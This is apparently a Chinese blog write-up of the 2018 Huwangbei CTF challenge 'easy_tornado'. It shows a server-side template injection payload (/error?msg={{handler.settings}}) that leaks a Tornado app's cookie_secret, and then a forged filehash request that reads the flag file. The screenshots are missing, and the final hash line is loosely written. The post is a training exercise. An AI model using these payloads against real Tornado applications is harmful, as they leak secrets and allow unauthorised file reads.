0
点赞
收藏
分享

微信扫一扫

[护网杯 2018]easy_tornado

Java架构领域 2022-04-16 阅读 44

前言

这道题需要对tornado框架有一些熟悉。因为不熟悉,后面就完全没有思路了,也就不会做了。这道题不止考某个知识点,更重要的是面对未知的东西,怎么去找资料和搜哪些关键词。

解题

1、看名字就觉得眼熟,额,是python框架。大概会涉及到SSTI。
在这里插入图片描述2、flag在/fllllllllllllag,但是还需要filehash。而且cookie_secret也不知道是啥。
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述3、访问/fllllllllllllag时,出现这个页面。前面的都没有SSTI,试试这个就有了。
在这里插入图片描述4、现在目标就是怎么利用msg这个参数来找到cookie_secret了。
看大佬wp:

在这里插入图片描述
5、/error?msg={{handler.settings}}
在这里插入图片描述6、

payload:
/file?filename=/fllllllllllllag&filehash=ae495ccce0de1854f26d48060d15e6ec

md5(/fllllllllllllag)===  3bf9f6cf685a6dd8defadabfb41a03a1 
cookie_secret  ===  74070940-0627-49bd-876d-dc19e01f4b80    
md5(cookie_secret+md5(filename))  ===  74070940-0627-49bd-876d-dc19e01f4b803bf9f6cf685a6dd8defadabfb41a03a1                                                           

7、参考文章

举报

相关推荐

0 条评论